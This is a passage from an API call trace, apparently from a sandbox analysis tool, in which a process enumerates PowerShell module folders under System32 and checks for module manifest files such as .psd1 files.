	[0046.867] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\", lpFilePart=0x0) returned 0x54
	[0046.867] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab7b60
	[0046.867] FindNextFileW (in: hFindFile=0x1505fab7b60, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.867] FindNextFileW (in: hFindFile=0x1505fab7b60, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.867] FindNextFileW (in: hFindFile=0x1505fab7b60, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0046.867] FindClose (in: hFindFile=0x1505fab7b60 | out: hFindFile=0x1505fab7b60) returned 1
	[0046.867] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0046.867] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0046.867] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.diagnostics\\microsoft.powershell.diagnostics.psd1")) returned 0x20
	[0046.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.868] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host", lpFilePart=0x0) returned 0x4c
	[0046.868] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\", lpFilePart=0x0) returned 0x4d
	[0046.868] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab8940
	[0046.868] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.868] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.868] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.868] FindClose (in: hFindFile=0x1505fab8940 | out: hFindFile=0x1505fab8940) returned 1
	[0046.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.869] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.869] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host", lpFilePart=0x0) returned 0x4c
	[0046.869] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\", lpFilePart=0x0) returned 0x4d
	[0046.869] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab8220
	[0046.869] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.869] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.869] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.869] FindClose (in: hFindFile=0x1505fab8220 | out: hFindFile=0x1505fab8220) returned 1
	[0046.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.869] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x105, lpBuffer=0x184c18d8a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host", lpFilePart=0x0) returned 0x4c
	[0046.869] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0046.869] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.host"), fInfoLevelId=0x0, lpFileInformation=0x184c18ddc0 | out: lpFileInformation=0x184c18ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0046.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0046.870] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0046.870] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x105, lpBuffer=0x184c18d800, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host", lpFilePart=0x0) returned 0x4c
	[0046.870] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\", lpFilePart=0x0) returned 0x4d
	[0046.870] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab86a0
	[0046.870] FindNextFileW (in: hFindFile=0x1505fab86a0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.870] FindNextFileW (in: hFindFile=0x1505fab86a0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.870] FindNextFileW (in: hFindFile=0x1505fab86a0, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0046.870] FindClose (in: hFindFile=0x1505fab86a0 | out: hFindFile=0x1505fab86a0) returned 1
	[0046.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0046.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0046.870] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.host\\microsoft.powershell.host.psd1")) returned 0x20
	[0046.871] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.871] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management", lpFilePart=0x0) returned 0x52
	[0046.871] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\", lpFilePart=0x0) returned 0x53
	[0046.871] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7c20
	[0046.871] FindNextFileW (in: hFindFile=0x1505fab7c20, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.872] FindNextFileW (in: hFindFile=0x1505fab7c20, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.872] FindNextFileW (in: hFindFile=0x1505fab7c20, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.872] FindClose (in: hFindFile=0x1505fab7c20 | out: hFindFile=0x1505fab7c20) returned 1
	[0046.872] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.872] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.872] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.872] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management", lpFilePart=0x0) returned 0x52
	[0046.872] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\", lpFilePart=0x0) returned 0x53
	[0046.872] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7aa0
	[0046.872] FindNextFileW (in: hFindFile=0x1505fab7aa0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.872] FindNextFileW (in: hFindFile=0x1505fab7aa0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.873] FindNextFileW (in: hFindFile=0x1505fab7aa0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.873] FindClose (in: hFindFile=0x1505fab7aa0 | out: hFindFile=0x1505fab7aa0) returned 1
	[0046.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.873] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x105, lpBuffer=0x184c18d8a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management", lpFilePart=0x0) returned 0x52
	[0046.873] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0046.873] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management"), fInfoLevelId=0x0, lpFileInformation=0x184c18ddc0 | out: lpFileInformation=0x184c18ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0046.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0046.873] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0046.873] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x105, lpBuffer=0x184c18d800, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management", lpFilePart=0x0) returned 0x52
	[0046.873] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\", lpFilePart=0x0) returned 0x53
	[0046.873] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab8640
	[0046.873] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.873] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0046.874] FindNextFileW (in: hFindFile=0x1505fab8640, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0046.874] FindClose (in: hFindFile=0x1505fab8640 | out: hFindFile=0x1505fab8640) returned 1
	[0046.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0046.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0046.874] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1")) returned 0x20
	[0046.874] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.874] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", lpFilePart=0x0) returned 0x52
	[0046.874] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\", lpFilePart=0x0) returned 0x53
	[0046.875] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7860
	[0046.876] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.876] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.876] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.876] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.876] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.876] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.877] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.877] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.877] FindClose (in: hFindFile=0x1505fab7860 | out: hFindFile=0x1505fab7860) returned 1
	[0046.877] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.877] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.877] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0046.877] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", lpFilePart=0x0) returned 0x52
	[0046.877] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\", lpFilePart=0x0) returned 0x53
	[0046.878] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab8940
	[0046.878] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.878] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.878] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.879] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.879] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.879] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.879] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0046.879] FindNextFileW (in: hFindFile=0x1505fab8940, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0046.879] FindClose (in: hFindFile=0x1505fab8940 | out: hFindFile=0x1505fab8940) returned 1
	[0046.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0046.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0046.879] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18db20) returned 1
	[0046.879] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US", nBufferLength=0x105, lpBuffer=0x184c18d610, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US", lpFilePart=0x0) returned 0x58
	[0046.880] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\", nBufferLength=0x105, lpBuffer=0x184c18d5b0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\", lpFilePart=0x0) returned 0x59
	[0046.880] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\*", lpFindFileData=0x184c18d7c0 | out: lpFindFileData=0x184c18d7c0) returned 0x1505fab7860
	[0046.880] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0046.881] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0046.881] FindNextFileW (in: hFindFile=0x1505fab7860, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 0
	[0046.881] FindClose (in: hFindFile=0x1505fab7860 | out: hFindFile=0x1505fab7860) returned 1
	[0046.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18da70) returned 1
	[0046.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18da30) returned 1
	[0046.881] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18db20) returned 1
	[0046.881] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US", nBufferLength=0x105, lpBuffer=0x184c18d610, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US", lpFilePart=0x0) returned 0x58
	[0046.881] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\", nBufferLength=0x105, lpBuffer=0x184c18d5b0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\", lpFilePart=0x0) returned 0x59
	[0046.886] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\*", lpFindFileData=0x184c18d7c0 | out: lpFindFileData=0x184c18d7c0) returned 0x1505fab84c0
	[0046.886] FindNextFileW (in: hFindFile=0x1505fab84c0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0046.886] FindNextFileW (in: hFindFile=0x1505fab84c0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0046.886] FindNextFileW (in: hFindFile=0x1505fab84c0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 0
	[0046.886] FindClose (in: hFindFile=0x1505fab84c0 | out: hFindFile=0x1505fab84c0) returned 1
	[0046.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18da70) returned 1
	[0046.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18da30) returned 1
	[0046.889] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US", nBufferLength=0x105, lpBuffer=0x184c18d710, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US", lpFilePart=0x0) returned 0x58
	[0046.889] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18db50) returned 1
	[0046.889] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\en-us"), fInfoLevelId=0x0, lpFileInformation=0x184c18dc30 | out: lpFileInformation=0x184c18dc30*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0046.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18db10) returned 1
	[0046.889] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18db80) returned 1
	[0046.889] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US", nBufferLength=0x105, lpBuffer=0x184c18d670, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US", lpFilePart=0x0) returned 0x58
	[0046.889] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\", nBufferLength=0x105, lpBuffer=0x184c18d610, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\", lpFilePart=0x0) returned 0x59
	[0046.890] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\*", lpFindFileData=0x184c18d820 | out: lpFindFileData=0x184c18d820) returned 0x1505fab8220
	[0046.890] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18d870 | out: lpFindFileData=0x184c18d870) returned 1
	[0046.890] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18d870 | out: lpFindFileData=0x184c18d870) returned 1
	[0046.890] FindNextFileW (in: hFindFile=0x1505fab8220, lpFindFileData=0x184c18d870 | out: lpFindFileData=0x184c18d870) returned 0
	[0046.890] FindClose (in: hFindFile=0x1505fab8220 | out: hFindFile=0x1505fab8220) returned 1
	[0046.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dad0) returned 1
	[0046.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18da90) returned 1
	[0046.890] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\en-US.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\en-us\\en-us.psd1")) returned 0xffffffff
	[0046.890] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\en-US.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\en-us\\en-us.psm1")) returned 0xffffffff
	[0046.890] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\en-US.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\en-us\\en-us.cdxml")) returned 0xffffffff
	[0046.891] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\en-US.xaml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\en-us\\en-us.xaml")) returned 0xffffffff
